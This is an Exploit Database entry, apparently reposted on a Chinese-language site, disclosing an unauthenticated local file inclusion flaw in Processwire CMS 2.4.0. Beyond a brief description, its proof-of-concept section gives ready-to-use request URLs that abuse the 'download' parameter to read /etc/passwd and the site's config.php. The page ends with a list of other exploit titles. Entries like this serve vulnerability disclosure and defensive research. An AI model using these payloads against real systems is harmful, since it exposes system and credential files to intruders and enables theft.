Processwire CMS 2.4.0 – ‘download’ Local File Inclusion

Exploit Database
40 阅读

作者： Y1LD1R1M

日期： 2020-11-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48986/

# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
# Vulnerability Type: Unauthenticated LFI
# Date: [03.11.2020]
# Exploit Author: [Y1LD1R1M]
# Type: [WEBAPPS]
# Platform: [PHP]
# Vendor Homepage: [https://processwire.com/]
# Version: [2.4.0]
# Tested on: [Kali Linux]


** Description **

Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.

** Proof of Concept **

http://URL/index.php?download=/etc/passwd

http://URL/index.php?download=../config.php

last Exploits
Processwire CMS 2.4.0 – ‘download’ Local File Inclusion的更多信息

Job Portal Platform 1.0 – SQL Injection：
OpenEMR 5.0.1.3 – (Authenticated) Arbitrary File Actions：
phpBB MyPage Plugin – SQL Injection：
Ajax Full Featured Calendar 2.0 – ‘search’ SQL Injection：
vTiger CRM 5.4.0 – ‘index.php?onlyforuser’ SQL Injection：
WordPress Plugin User Meta Manager 3.4.6 – Information Disclosure：
Sahana Agasti 0.6.4 – Multiple Remote File Inclusions：
Joomla! Component com_sbsfile – Local File Inclusion：